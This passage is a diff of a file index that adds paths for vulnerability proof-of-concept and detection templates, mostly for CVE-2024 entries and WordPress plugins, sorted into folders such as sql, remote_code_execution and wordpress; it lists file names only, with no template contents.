+./poc/cve/CVE-2024-7030-1f332171cf5ea8b289acd21b158dc3ee.yaml
 ./poc/cve/CVE-2024-7030-402f3274f80cf86dfc85b2b1e92bfb4d.yaml
 ./poc/cve/CVE-2024-7030.yaml
 ./poc/cve/CVE-2024-7031-35ed976385b4bbf47941a83215c20034.yaml
 ./poc/cve/CVE-2024-7031.yaml
 ./poc/cve/CVE-2024-7032-5e5f51c1ac280ac9a47a523a59464bd7.yaml
+./poc/cve/CVE-2024-7032-cabe7edb9453e46b358c075428df2586.yaml
 ./poc/cve/CVE-2024-7032.yaml
 ./poc/cve/CVE-2024-7054-b9029eac922ff3ca5bc6805910a1e977.yaml
 ./poc/cve/CVE-2024-7054.yaml
@@ -42045,6 +42074,7 @@
 ./poc/cve/CVE-2024-7302.yaml
 ./poc/cve/CVE-2024-7304-6a941a094e752d8bf903d3ab424b756b.yaml
 ./poc/cve/CVE-2024-7304.yaml
+./poc/cve/CVE-2024-7313-b762e54f8085d18804da0898542a5ec1.yaml
 ./poc/cve/CVE-2024-7317-ba5a614941cffb6dcbde33c96a783d3e.yaml
 ./poc/cve/CVE-2024-7317.yaml
 ./poc/cve/CVE-2024-7350-fae9f5c8afaa9888e7d61c55abf3bb9e.yaml
@@ -42079,11 +42109,13 @@
 ./poc/cve/CVE-2024-7414.yaml
 ./poc/cve/CVE-2024-7416-efec572b361a709c15a62ccf6c7c8234.yaml
 ./poc/cve/CVE-2024-7416.yaml
+./poc/cve/CVE-2024-7418-c9bdaa080236ee0e574742a6ecd2aa08.yaml
 ./poc/cve/CVE-2024-7420-5be6d8b9afb78ab58d15b1426a2e4662.yaml
 ./poc/cve/CVE-2024-7420.yaml
 ./poc/cve/CVE-2024-7422-687a511b4014fc6e48564ef68ecc160f.yaml
 ./poc/cve/CVE-2024-7422.yaml
 ./poc/cve/CVE-2024-7447-616934177af234fd0293527159d2650e.yaml
+./poc/cve/CVE-2024-7447.yaml
 ./poc/cve/CVE-2024-7484-5be14b55ae30eebe36f1e5fcad1d160a.yaml
 ./poc/cve/CVE-2024-7484.yaml
 ./poc/cve/CVE-2024-7485-5e01bfd496bdbeeb312898de18c1a6e1.yaml
@@ -42109,12 +42141,15 @@
 ./poc/cve/CVE-2024-7568-03c9c97fbcce1159bd078f05cbf27da7.yaml
 ./poc/cve/CVE-2024-7568.yaml
 ./poc/cve/CVE-2024-7573-1a1ac6c491c263147852f33621881cc9.yaml
+./poc/cve/CVE-2024-7573.yaml
 ./poc/cve/CVE-2024-7574-003dab2f041ca334b519548f81f66762.yaml
 ./poc/cve/CVE-2024-7574.yaml
 ./poc/cve/CVE-2024-7588-72d4c65f8b4a3c39e85f33895621e123.yaml
 ./poc/cve/CVE-2024-7588.yaml
 ./poc/cve/CVE-2024-7590-19260509de237ee0e6fc84e2c1694cfb.yaml
 ./poc/cve/CVE-2024-7590.yaml
+./poc/cve/CVE-2024-7606-06ad2ab98249fa61f169a794d53b3d8d.yaml
+./poc/cve/CVE-2024-7607-4e7f3690990262b436b42cdf215f4676.yaml
 ./poc/cve/CVE-2024-7621-410ca600b3388f15ef833a17e3d39b81.yaml
 ./poc/cve/CVE-2024-7621.yaml
 ./poc/cve/CVE-2024-7624-ebfd9e3cba7ebe22ec232d00cda9ba4f.yaml
@@ -42184,6 +42219,8 @@
 ./poc/cve/CVE-2024-7850.yaml
 ./poc/cve/CVE-2024-7854-c405929374c8ffa2432434eb86f570c7.yaml
 ./poc/cve/CVE-2024-7854.yaml
+./poc/cve/CVE-2024-7856-d011db87e0fcbee1bbbd734bfc806dcf.yaml
+./poc/cve/CVE-2024-7857-a18aa7c9dff5c4191bbf30ebf29a07a1.yaml
 ./poc/cve/CVE-2024-7860-7bfa7ad373e4b2369c7238a1709273fe.yaml
 ./poc/cve/CVE-2024-7860.yaml
 ./poc/cve/CVE-2024-7861-9726dbafcd5c9f5063d85ac5d4f9296c.yaml
@@ -42191,18 +42228,28 @@
 ./poc/cve/CVE-2024-7862-0efbcc5b1f2d84d6982c89d56528850a.yaml
 ./poc/cve/CVE-2024-7862.yaml
 ./poc/cve/CVE-2024-7863-d3242f03e4b845277a7311f26e80d2a3.yaml
+./poc/cve/CVE-2024-7863.yaml
+./poc/cve/CVE-2024-7895-ac1e11d6be8490c8494a930a375e9a8e.yaml
 ./poc/cve/CVE-2024-7918-a7e65e7119ee7b26b163171cf42cfe15.yaml
 ./poc/cve/CVE-2024-7918.yaml
 ./poc/cve/CVE-2024-8030-4bf23408e0dc80a213e018f362e5999c.yaml
+./poc/cve/CVE-2024-8030.yaml
+./poc/cve/CVE-2024-8043-613641adfae0294950a0fa915c4316f4.yaml
+./poc/cve/CVE-2024-8044-c5c06b8842bfb695b2f240b2af75787b.yaml
 ./poc/cve/CVE-2024-8046-15e0de38601f3b1bc315968586b907cd.yaml
 ./poc/cve/CVE-2024-8046.yaml
+./poc/cve/CVE-2024-8047-f6817d306b4651cd60631b6b036a3959.yaml
+./poc/cve/CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab.yaml
+./poc/cve/CVE-2024-8052-e7604b09bc8937658ab6d84d35011faf.yaml
 ./poc/cve/CVE-2024-8054-3cc73472d29ef86c20298b7294006219.yaml
 ./poc/cve/CVE-2024-8054.yaml
 ./poc/cve/CVE-2024-8056-9a2f1d50842378dfbd24cfe6b36f0b56.yaml
 ./poc/cve/CVE-2024-8056.yaml
+./poc/cve/CVE-2024-8091-2a76422fe65a9439ffb66d6cccbb9f37.yaml
 ./poc/cve/CVE-2024-8120-3613ebb9d30f84ec400bcf99e23d31d1.yaml
 ./poc/cve/CVE-2024-8120.yaml
 ./poc/cve/CVE-2024-8195-55ed6b4889c7dbecb6bd9deee053ca6e.yaml
+./poc/cve/CVE-2024-8195.yaml
 ./poc/cve/CVE-2024-8197-c5c070dc8273cbfedbc9600c73cd97ad.yaml
 ./poc/cve/CVE-2024-8197.yaml
 ./poc/cve/CVE-2024-8199-0aa4becb897b22474a7caa43aa9de6d0.yaml
@@ -52182,6 +52229,7 @@
 ./poc/detect/sage-detect-9977.yaml
 ./poc/detect/sage-detect.yaml
 ./poc/detect/salesforce-aura-detect.yml
+./poc/detect/salesforce-contentdocument-detector.yaml
 ./poc/detect/salesforce-credentials-detect.yml
 ./poc/detect/samba-detect-9988.yaml
 ./poc/detect/samba-detect-9989.yaml
@@ -58381,6 +58429,7 @@
 ./poc/microsoft/arforms-26fe806013e504007c55ee9bcfa2e17f.yaml
 ./poc/microsoft/arforms-2a84b95c6af8ac3490d174013ff0e55e.yaml
 ./poc/microsoft/arforms-4c2c7eaf0ffa73d26ccfcad83f902cf6.yaml
+./poc/microsoft/arforms-881dfd77d6d86c39aaa256deaef65e79.yaml
 ./poc/microsoft/arforms-9dcfc8d60c705c589e8c6830bc121023.yaml
 ./poc/microsoft/arforms-d0ccd43103166ffa3ebb9f8ca68d4b35.yaml
 ./poc/microsoft/arforms-de420f12fa5b8ba5eb02c47236a604c8.yaml
@@ -58946,6 +58995,7 @@
 ./poc/microsoft/funnelforms-free-af02e5854a895e2a81d66025bba334eb.yaml
 ./poc/microsoft/funnelforms-free-b8072e17b22a3f23d6009926407bbb88.yaml
 ./poc/microsoft/funnelforms-free-c836a3d7c01c45d13328a529fe028d13.yaml
+./poc/microsoft/funnelforms-free-d673e9b78beed9be045c9fddcda8387c.yaml
 ./poc/microsoft/funnelforms-free-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/microsoft/funnelforms-free-plugin.yaml
 ./poc/microsoft/funnelforms-free.yaml
@@ -59831,6 +59881,7 @@
 ./poc/microsoft/snow-monkey-forms-b870dfd4deccc70c5aa8363616a97294.yaml
 ./poc/microsoft/snow-monkey-forms.yaml
 ./poc/microsoft/social-msdn.yaml
+./poc/microsoft/special-feed-items-27adb5630206288cc4533169053590e1.yaml
 ./poc/microsoft/sqli-vuln-params-deep.yaml
 ./poc/microsoft/sqli-vuln-params.yaml
 ./poc/microsoft/ssrf-vuln-params.yaml
@@ -59934,6 +59985,7 @@
 ./poc/microsoft/views-for-wpforms-lite-e1e6ef7422e9825abd84f53bc49fe1ad.yaml
 ./poc/microsoft/views-for-wpforms-lite-feeee6243e2c0dd8545fdb4bfc1c6f95.yaml
 ./poc/microsoft/views-for-wpforms-lite.yaml
+./poc/microsoft/visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams-5722dca07cc58dd07b8ebb2a7f03be3f.yaml
 ./poc/microsoft/vmstio-mastodon-instance.yaml
 ./poc/microsoft/vospari-forms-e9bd69dbdf78833ce2843fc07cba7b74.yaml
 ./poc/microsoft/vospari-forms.yaml
@@ -62901,6 +62953,7 @@
 ./poc/other/ai-engine-1eab670c9904ae9ad196227a107b8626.yaml
 ./poc/other/ai-engine-31c4e72796ef84f57eeac02cdfb2c906.yaml
 ./poc/other/ai-engine-3a9b23c9556cad6d3fcaec0a0bacdf86.yaml
+./poc/other/ai-engine-3bae955ccade96ed3bb2f0c913880abb.yaml
 ./poc/other/ai-engine-c182dd6752641ac5204307ceb38c0446.yaml
 ./poc/other/ai-engine-c6a6622e05cafbce41ce40b2860abe7d.yaml
 ./poc/other/ai-engine-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -64257,6 +64310,7 @@
 ./poc/other/auxin-elements-plugin.yaml
 ./poc/other/auxin-elements.yaml
 ./poc/other/auxin-portfolio-4265e0732bc9685cf1e2090597ba0651.yaml
+./poc/other/auxin-portfolio-937e73528345004677d696748421a9a3.yaml
 ./poc/other/auxin-portfolio-aad1583ff5243a02a6a3df48947d3849.yaml
 ./poc/other/auxin-portfolio.yaml
 ./poc/other/auxin-shop-73b3278144ae687a0950408e692f512b.yaml
@@ -64750,6 +64804,7 @@
 ./poc/other/beaver-builder-lite-version-5b42cfef5da69a9668244c9c487eca3c.yaml
 ./poc/other/beaver-builder-lite-version-61ae33d7c990a629b171160654bc6e2e.yaml
 ./poc/other/beaver-builder-lite-version-6229d60925190e54ee6d1e7dfb1b109a.yaml
+./poc/other/beaver-builder-lite-version-7f5f101995ccdcf10c7e7f5808c934b6.yaml
 ./poc/other/beaver-builder-lite-version-8fb79d694642d9144754619ceddfad1c.yaml
 ./poc/other/beaver-builder-lite-version-9031f2623733acade8c80c6f38217e78.yaml
 ./poc/other/beaver-builder-lite-version-96760c012f66a04ff7ddf7d14acc05e8.yaml
@@ -65348,6 +65403,7 @@
 ./poc/other/booking-system-5ca35f110e7f139c43edd414d499b711.yaml
 ./poc/other/booking-system-61584ec0391f5ec65a361a7822426d2a.yaml
 ./poc/other/booking-system-85504272f234bfb9e971fc1ed126d991.yaml
+./poc/other/booking-system-8649e5bc1fc86fb49801894149b7194d.yaml
 ./poc/other/booking-system-936593a221fe0a9be355a3ef42dc7754.yaml
 ./poc/other/booking-system-c858eff2796d9fd91084c99d73ede84f.yaml
 ./poc/other/booking-system-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -66823,6 +66879,7 @@
 ./poc/other/chained-quiz-cfac973be4435abc14e53ab3918e8897.yaml
 ./poc/other/chained-quiz-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/chained-quiz-d9e0ca31c69ddc9adc6aa3461bc17cae.yaml
+./poc/other/chained-quiz-e57df0d2ff1d620125911e7a7435441f.yaml
 ./poc/other/chained-quiz-e80947e0f5efe37249f4a862fc8303ad.yaml
 ./poc/other/chained-quiz-f8ecf6d2cdf4b1f49c0d4934987326ef.yaml
 ./poc/other/chained-quiz-fd2eed70f50ca774614b0a0fab8af1f4.yaml
@@ -69706,6 +69763,7 @@
 ./poc/other/ditty-news-ticker-3df7579faeed40129add08a0c00a9e28.yaml
 ./poc/other/ditty-news-ticker-5c7fc09c612e6c5bfb7efa77dd1a0500.yaml
 ./poc/other/ditty-news-ticker-6c0ac7a495344322f6c300dcc6f855c0.yaml
+./poc/other/ditty-news-ticker-707207d8728290146b99c3b10fa2d8a1.yaml
 ./poc/other/ditty-news-ticker-79dd41cd4825dcf2ffc30e6a350d64a1.yaml
 ./poc/other/ditty-news-ticker-a3f5dfe9920983a4a38befdd195d7849.yaml
 ./poc/other/ditty-news-ticker-a92ba7f8446645be5de52349fb64fddd.yaml
@@ -73571,6 +73629,7 @@
 ./poc/other/front-end-only-users-42a6deb31b014ad8ea5c1c5adfffc764.yaml
 ./poc/other/front-end-only-users-51fc59980506bded179e7076785b2fa5.yaml
 ./poc/other/front-end-only-users-86ce913487fd084ff54b35448082b5a9.yaml
+./poc/other/front-end-only-users-90df2a922aebe8c48da99b7fe999c319.yaml
 ./poc/other/front-end-only-users-bae8101474847a727907e55725750ef1.yaml
 ./poc/other/front-end-only-users-be56f44b1886aa91b452736929be6d20.yaml
 ./poc/other/front-end-only-users-d0ee2ea71060210abcdd3e8ff88d5a02.yaml
@@ -73653,6 +73712,7 @@
 ./poc/other/funnel-builder-03ab81e64f7fe608d6bf74784a682e15.yaml
 ./poc/other/funnel-builder-0c29b10ac5f2b67025dc11e0e4e5b3d1.yaml
 ./poc/other/funnel-builder-35d0f48b25eee02d4a76c4aac611f3cf.yaml
+./poc/other/funnel-builder-pro-eb1e588869835492ad97803c9c5af7ab.yaml
 ./poc/other/funnel-builder.yaml
 ./poc/other/furaffinity.yaml
 ./poc/other/furiffic.yaml
@@ -74239,6 +74299,7 @@ ./poc/other/give-56fcb08335fa0e8d65d79e7d74662583.yaml ./poc/other/give-59e5b5852a8758d972786a870f288f8c.yaml ./poc/other/give-59f2c303d4c8e047a063b3768c858674.yaml +./poc/other/give-5a41f38fc1abdcc291ed6c8ada86ceb0.yaml ./poc/other/give-608015e360b20b1e783be5bd38472a14.yaml ./poc/other/give-73f9df5cda1303cb8153339e758af542.yaml ./poc/other/give-791995e7fcc889e009711c543cbc6911.yaml @@ -75991,6 +76052,7 @@ ./poc/other/infographic-and-list-builder-ilist-cb68e3d0f3afd2e233b2cf11c375ecee.yaml ./poc/other/infographic-and-list-builder-ilist-fe821d6f962b3565934600d635d125e2.yaml ./poc/other/infographic-and-list-builder-ilist.yaml +./poc/other/infolinks-ad-wrap-ac5f97e3e98b5cccd5e941c630594293.yaml ./poc/other/infomaster.yaml ./poc/other/infopro-system.yaml ./poc/other/information-operation-and-maintenance-support-system.yaml @@ -78971,6 +79033,7 @@ ./poc/other/media-library-categories.yaml ./poc/other/media-library-helper-7c452443c905a19a3f2ff0751c931385.yaml ./poc/other/media-library-helper.yaml +./poc/other/media-library-plus-305e1ca5563918c203ad44639d735fe6.yaml ./poc/other/media-library-plus-3c875a74cf089dc5f088b86f95d51a44.yaml ./poc/other/media-library-plus-6958e86a5f3260acb61e16cf3aefe65d.yaml ./poc/other/media-library-plus-798cf28296e1bc5f2617b863aa4a2416.yaml @@ -79552,6 +79615,7 @@ ./poc/other/mobile-menu-ff2bccbc0b229e94859e133ae9794789.yaml ./poc/other/mobile-menu.yaml ./poc/other/mobile-office-system.yaml +./poc/other/mobile-security-framework.yaml ./poc/other/mobilechief-mobile-site-creator-5f5cd897a0fd99c68ed3243116fd0eb9.yaml ./poc/other/mobilechief-mobile-site-creator-67366a910dc8a6b2a903a9cde298a7bd.yaml ./poc/other/mobilechief-mobile-site-creator-d41d8cd98f00b204e9800998ecf8427e.yaml 
@@ -79813,6 +79877,7 @@ ./poc/other/mp3-music-player-by-sonaar-33bbd6d8e2227cc880a8f342a2153144.yaml ./poc/other/mp3-music-player-by-sonaar-574b1a0b1219c1f301e66aed3aa298fd.yaml ./poc/other/mp3-music-player-by-sonaar-83f590dd1d6d6590548d60ef5ab5a434.yaml +./poc/other/mp3-music-player-by-sonaar-d5f0e031999dc4b1252ad5515dddcfaf.yaml ./poc/other/mp3-music-player-by-sonaar-eaa11f6096352a7e30275d7b58eca2b6.yaml ./poc/other/mp3-music-player-by-sonaar-efcc42f71e59bbbbd35d93b5cb747af1.yaml ./poc/other/mp3-music-player-by-sonaar.yaml @@ -83138,6 +83203,7 @@ ./poc/other/premium-addons-pro.yaml ./poc/other/premium-blocks-for-gutenberg-44d7124985adf47ae8ba87fad38be29f.yaml ./poc/other/premium-blocks-for-gutenberg.yaml +./poc/other/premium-seo-pack-016f4f965dace571e947d960d2934b03.yaml ./poc/other/premium-seo-pack-light-version-19d07348fd99a9ad2e1c2603001a2ec9.yaml ./poc/other/premium-seo-pack-light-version-70f9035f25476959d09b902faa701941.yaml ./poc/other/premium-seo-pack-light-version-cbef76100ef4ab2ab9388eeffe1e56cd.yaml @@ -83897,6 +83963,7 @@ ./poc/other/quiz-master-next-9f3fecd6206083fbc65ab446e8ce0265.yaml ./poc/other/quiz-master-next-a0627a12afed72d234446d1f03dd9d3e.yaml ./poc/other/quiz-master-next-a1064d332d70630bcfc494d984cf417d.yaml +./poc/other/quiz-master-next-a245f156676109e1d14f3370b00c9905.yaml ./poc/other/quiz-master-next-a3d1d2b7f98adf4393f82161df14beb6.yaml ./poc/other/quiz-master-next-a4b5a4030f887b8f9433b81573197330.yaml ./poc/other/quiz-master-next-b602027d673c87da63f0c568c42161ef.yaml @@ -84082,6 +84149,7 @@ ./poc/other/rating-widget-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/rating-widget-plugin.yaml ./poc/other/rating-widget.yaml +./poc/other/ratings-shorttags-3f67e2b8c30c94499ec4eae8289c70a2.yaml ./poc/other/ravpage-b5a51590524092b47fea1bc58ca48251.yaml ./poc/other/ravpage.yaml ./poc/other/raw-get-query.yaml 
@@ -84402,6 +84470,7 @@ ./poc/other/registrations-for-the-events-calendar-3408c179f74dffb1eeed57c7a66c7291.yaml ./poc/other/registrations-for-the-events-calendar-9d435a74f26e51e47dad9dfdf9a139c2.yaml ./poc/other/registrations-for-the-events-calendar-a238c9d2ece472f17824de5d31d6069b.yaml +./poc/other/registrations-for-the-events-calendar-cff64aa365787e00304f119ad6984b45.yaml ./poc/other/registrations-for-the-events-calendar.yaml ./poc/other/registrations.yaml ./poc/other/reglevel-7cfd0127f9691842573b026b66abb98f.yaml @@ -88995,6 +89064,7 @@ ./poc/other/the-plus-addons-for-elementor-page-builder-e5d05f7bff385631c49a27037bd23b98.yaml ./poc/other/the-plus-addons-for-elementor-page-builder.yaml ./poc/other/the-post-grid-0c8d16610621e9c28d71eeb8c31f9fda.yaml +./poc/other/the-post-grid-11c57e46d323949f1474677c8ea8f409.yaml ./poc/other/the-post-grid-277b846f037661602a5cdf2cd4c5faa9.yaml ./poc/other/the-post-grid-464546bd928fff316990fcd5bd1064e7.yaml ./poc/other/the-post-grid-4b9860ffe0bf76a06c6e50adec3d7162.yaml @@ -91206,6 +91276,7 @@ ./poc/other/vikbooking-f3fd55810541d8ee7d830f7442150020.yaml ./poc/other/vikbooking-f641bf38657def40bf1f654bef54a22e.yaml ./poc/other/vikbooking.yaml +./poc/other/vikinghammer-tweet-250b3e7014946f4e8b446448451f1a15.yaml ./poc/other/vikrentcar-23ee5b490e4220043ba76780fe414977.yaml ./poc/other/vikrentcar-3b2d01d947709f6288c8a9939301b0c0.yaml ./poc/other/vikrentcar-434e6d40976c0b99f8a5b55bdcf33934.yaml @@ -92544,6 +92615,7 @@ ./poc/other/woo-products-widgets-for-elementor-42185b875105a7f60d9e9dab75c7a958.yaml ./poc/other/woo-products-widgets-for-elementor-899c764ee1e1018364a0620ec38aa86d.yaml ./poc/other/woo-products-widgets-for-elementor.yaml +./poc/other/woo-producttables-pro-feb88140040e1c1f4c2ea5be5291d525.yaml ./poc/other/woo-razorpay-0b6ba0ef65091e980a007902aaeb38d9.yaml ./poc/other/woo-razorpay-6885c7666d38712333fe3571b0662f15.yaml ./poc/other/woo-razorpay-d37891a8b008c61565c4ae3febc9ba56.yaml 
@@ -93585,6 +93657,7 @@ ./poc/other/zephyr-project-manager-8ba2c39394e29aba6053c8c245fd4e4f.yaml ./poc/other/zephyr-project-manager-9463c1fa75789b96e3321b2f88104561.yaml ./poc/other/zephyr-project-manager-9f55f9a9396be5c13bf372d01a3cc1ee.yaml +./poc/other/zephyr-project-manager-ae04686326d43f919e9c393e1e364c95.yaml ./poc/other/zephyr-project-manager-c31566302316f804e8d88462afc5b957.yaml ./poc/other/zephyr-project-manager-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/zephyr-project-manager-d9aa28dd254164bdf23311d9c0563c2c.yaml @@ -96420,6 +96493,7 @@ ./poc/remote_code_execution/salesforce-aura-detect.yml ./poc/remote_code_execution/salesforce-aura-misconfig.yaml ./poc/remote_code_execution/salesforce-aura.yaml +./poc/remote_code_execution/salesforce-contentdocument-detector.yaml ./poc/remote_code_execution/salesforce-credentials-detect.yml ./poc/remote_code_execution/salesforce-credentials.yaml ./poc/remote_code_execution/salesforce-login.yaml @@ -96723,6 +96797,7 @@ ./poc/remote_code_execution/thinkphp-rce.yaml ./poc/remote_code_execution/thinkphp5-controller-rce.yaml ./poc/remote_code_execution/thinkphp5-rce-invokefunction.yaml +./poc/remote_code_execution/ti-woocommerce-wishlist-0ce5399103aadb3b44c880eafe1a56e5.yaml ./poc/remote_code_execution/ti-woocommerce-wishlist-10a53bde52ea4e38b3796757c87f7919.yaml ./poc/remote_code_execution/ti-woocommerce-wishlist-2fe046cc3ef502058d32115ea2704f23.yaml ./poc/remote_code_execution/ti-woocommerce-wishlist-5392b5fdcfe0748b748f3428e0fd50d5.yaml 
@@ -98520,6 +98595,7 @@ ./poc/search/events-search-addon-for-the-events-calendar-ed564cf6d52fca31d8e377a3e7178e36.yaml ./poc/search/events-search-addon-for-the-events-calendar.yaml ./poc/search/exposed-elasticsearch.yaml +./poc/search/extended-search-plugin-7e067968dc74df931237c1c4dd7e5960.yaml ./poc/search/fast-search-powered-by-solr-567141b8d4c166072ebecab73e5df591.yaml ./poc/search/fast-search-powered-by-solr-801c775ce138d2a8118318fc2430ec99.yaml ./poc/search/fast-search-powered-by-solr.yaml @@ -98601,6 +98677,7 @@ ./poc/search/premmerce-search-6477bf18cad6c823db485408d49b337b.yaml ./poc/search/premmerce-search.yaml ./poc/search/relevanssi-live-ajax-search-83bf0b123079e7cad5f57465205edb83.yaml +./poc/search/relevanssi-live-ajax-search.yaml ./poc/search/researchgate.yaml ./poc/search/ricerca-smart-search-4dd300604fbacb789cffd4c76bfe7480.yaml ./poc/search/ricerca-smart-search-50ed4a614d4d7b0510bf1cfaa59265ef.yaml @@ -102005,6 +102082,7 @@ ./poc/sql/CVE-2024-6797-b6db90f6651f67f2c92f688656bcca15.yaml ./poc/sql/CVE-2024-6928-66d36a40cf2172db26cce7deee6ee28d.yaml ./poc/sql/CVE-2024-7027-90534f21ba7ac35c6aefb4db06d95b2d.yaml +./poc/sql/CVE-2024-7032-cabe7edb9453e46b358c075428df2586.yaml ./poc/sql/CVE-2024-7092-4edc2efb8d8dec4f4786c242db407100.yaml ./poc/sql/CVE-2024-7145-4e8d81a353841cdd435dbb6eddfecc6d.yaml ./poc/sql/CVE-2024-7258-ed6ffad18c93f5ae2665db7f4a1ac069.yaml @@ -102014,7 +102092,9 @@ ./poc/sql/CVE-2024-7485-5e01bfd496bdbeeb312898de18c1a6e1.yaml ./poc/sql/CVE-2024-7702-dea8b852582db90080db47397ce3b7b1.yaml ./poc/sql/CVE-2024-7817-49083f3d0aeb0ae2badbca3840ad0f3c.yaml +./poc/sql/CVE-2024-7856-d011db87e0fcbee1bbbd734bfc806dcf.yaml ./poc/sql/CVE-2024-7861-9726dbafcd5c9f5063d85ac5d4f9296c.yaml +./poc/sql/CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab.yaml ./poc/sql/CVE-2024-8195-55ed6b4889c7dbecb6bd9deee053ca6e.yaml ./poc/sql/CVE-2024-8197-c5c070dc8273cbfedbc9600c73cd97ad.yaml ./poc/sql/Changdao-165-SQLi.yaml 
@@ -103872,6 +103952,7 @@ ./poc/sql/free-sales-funnel-squeeze-pages-landing-page-builder-templates-make-267c13265a681f5c4a2cf3601cdb366d.yaml ./poc/sql/front-editor-32318705974ddbe58699ce6da10f1b94.yaml ./poc/sql/front-editor-6477bf18cad6c823db485408d49b337b.yaml +./poc/sql/front-end-only-users-947badb91b071755d9969be9242e4456.yaml ./poc/sql/front-end-pm-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/frontend-admin-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/frontend-dashboard-66dbd6260c14053dd1b309c0ab1ebd48.yaml @@ -104956,6 +105037,7 @@ ./poc/sql/pootle-page-builder-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/pop-over-xyz-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/poptin-7cbdb58b6f86c99de893fc416e018237.yaml +./poc/sql/popup-builder-6301c8edbc1b7bd38ba274bd8ed00bc7.yaml ./poc/sql/popup-builder-a60ee164dbf87550705a98fa83f6ae1e.yaml ./poc/sql/popup-contact-form-d7fe7df201dbe46f7fb6353e363adf4f.yaml ./poc/sql/popup-maker-0c52a75ad214cf1ecd2425c783e32fdb.yaml @@ -105571,6 +105653,7 @@ ./poc/sql/sparky-d4430db8e030babb446d9f42ad29ad59.yaml ./poc/sql/sparrow-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/speakout-761656f8a016cc53b64260bc97dbd54a.yaml +./poc/sql/special-feed-items-27adb5630206288cc4533169053590e1.yaml ./poc/sql/specialist-4f16956bc96bf33cfaec7936ef1db49d.yaml ./poc/sql/speculor-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/speedycache-2daed6154db55b1ece0b0e9800fd0aea.yaml @@ -105802,6 +105885,7 @@ ./poc/sql/the-plus-addons-for-elementor-page-builder-ac1456fe699653adb559ef6428f8f32d.yaml ./poc/sql/the-plus-addons-for-elementor-page-builder-db6d6e5d12628c106e7955a2ccfde5c2.yaml ./poc/sql/the100-d155d6ddfe8bbad0ff5fa76ddb2b1f37.yaml +./poc/sql/theme-editor-28b564b15db8ff756b87ff0ae5c6d260.yaml ./poc/sql/theme-translation-for-polylang-1e37a3d3db98482fdc846a90f25f0289.yaml ./poc/sql/themeisle-companion-3d37064e8dba0102789bdb52c9f67daf.yaml ./poc/sql/themeisle-companion-755da964edb520d5cfbbb5a99c28095b.yaml 
@@ -105823,6 +105907,7 @@ ./poc/sql/thumbs-db-disclosure-10763.yaml ./poc/sql/thumbs-db-disclosure.yaml ./poc/sql/thumbs-rating-2551aea37293f7feb377db28af59096c.yaml +./poc/sql/ti-woocommerce-wishlist-0ce5399103aadb3b44c880eafe1a56e5.yaml ./poc/sql/ti-woocommerce-wishlist-693cf8c022651775af0db87e0b8f752d.yaml ./poc/sql/ti-woocommerce-wishlist-premium-693cf8c022651775af0db87e0b8f752d.yaml ./poc/sql/tickera-event-ticketing-system-6477bf18cad6c823db485408d49b337b.yaml @@ -107059,6 +107144,7 @@ ./poc/sql/zendrop-dropshipping-and-fulfillment-d55b65118444e2b38ff7422e4f9db780.yaml ./poc/sql/zentao-16.5-SQL-Injection.yaml ./poc/sql/zephyr-project-manager-2344c6e5fd2a6b33bef79b4dfdb6641f.yaml +./poc/sql/zephyr-project-manager-2f2a157dfc44eea8c90827e9ff434dbb.yaml ./poc/sql/zephyr-project-manager-4b9092681d332cddbaffb74a02cdb2b5.yaml ./poc/sql/zephyr-project-manager-e7a921458cccf631ca4f612750bdb52e.yaml ./poc/sql/zero-spam-sqli.yaml @@ -111390,6 +111476,7 @@ ./poc/wordpress/geo-my-wp-369c2b051f106d2bb102fee948bdb8e7.yaml ./poc/wordpress/geo-my-wp-548422f8989b37ce1d1ac6c188ba749b.yaml ./poc/wordpress/geo-my-wp-ce1accf0fb8e48be29e3b6b0d1821078.yaml +./poc/wordpress/geo-my-wp-dcc08c9ab9de422a732b6dceb3c19f4e.yaml ./poc/wordpress/geo-my-wp.yaml ./poc/wordpress/go-fetch-jobs-wp-job-manager-0c1491d6d26301d18ac9c26473774100.yaml ./poc/wordpress/go-fetch-jobs-wp-job-manager-6477bf18cad6c823db485408d49b337b.yaml @@ -113278,6 +113365,7 @@ ./poc/wordpress/wp-accessibility-5a4b67d28c6affe4e8b4eb15f2d72cff.yaml ./poc/wordpress/wp-accessibility-68bab414f6d09e1ff81daed6d68d82ef.yaml ./poc/wordpress/wp-accessibility-d41d8cd98f00b204e9800998ecf8427e.yaml +./poc/wordpress/wp-accessibility-helper-2ebee88d3cc127551f1f7c34b744653e.yaml ./poc/wordpress/wp-accessibility-helper-631a78cfce362ea68ad18c1ab69ad468.yaml ./poc/wordpress/wp-accessibility-helper-892bd5ca7de4322007f47099d5b24ea3.yaml ./poc/wordpress/wp-accessibility-helper-999f2c639849929d4e26b2843e78f083.yaml 
@@ -116603,6 +116691,7 @@ ./poc/wordpress/wp-simple-fields-lfi-11570.yaml ./poc/wordpress/wp-simple-fields-lfi-11571.yaml ./poc/wordpress/wp-simple-fields-lfi.yaml +./poc/wordpress/wp-simple-firewall-2453dc94f5e62cf781881087cb516889.yaml ./poc/wordpress/wp-simple-firewall-3ae2ab7cde1e76100e523aaf928ed76a.yaml ./poc/wordpress/wp-simple-firewall-4f7bee968b7be1bbc933652a546908b5.yaml ./poc/wordpress/wp-simple-firewall-5843a59deee1d98f848220c24385547a.yaml @@ -117060,6 +117149,7 @@ ./poc/wordpress/wp-table-6bfac4f1efb2b97f1bd23e30846a82a5.yaml ./poc/wordpress/wp-table-builder-05c315c45c3d1e8458984521e6889db5.yaml ./poc/wordpress/wp-table-builder-084e237595f73d4c571f4d7a74f44e0b.yaml +./poc/wordpress/wp-table-builder-096fe66e1a6c03883512b366b27ff120.yaml ./poc/wordpress/wp-table-builder-11e6571d10bdd880ac43ae2729655450.yaml ./poc/wordpress/wp-table-builder-6477bf18cad6c823db485408d49b337b.yaml ./poc/wordpress/wp-table-builder-9118e8a75fb38be0239c547007b0913f.yaml @@ -117090,6 